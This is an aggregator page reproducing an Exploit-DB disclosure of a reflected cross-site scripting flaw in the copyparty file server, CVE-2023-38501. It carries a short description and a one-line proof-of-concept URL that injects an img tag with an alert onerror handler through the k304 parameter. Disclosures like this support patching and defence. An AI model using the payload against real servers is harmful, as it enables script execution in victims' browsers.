3

[webapps] copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

 10 months ago
source link: https://www.exploit-db.com/exploits/51635
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

EDB-ID:

51635

EDB Verified:

Platform:

Python

Date:

2023-07-28

Vulnerable App:

# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501



#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. 

Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.

#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK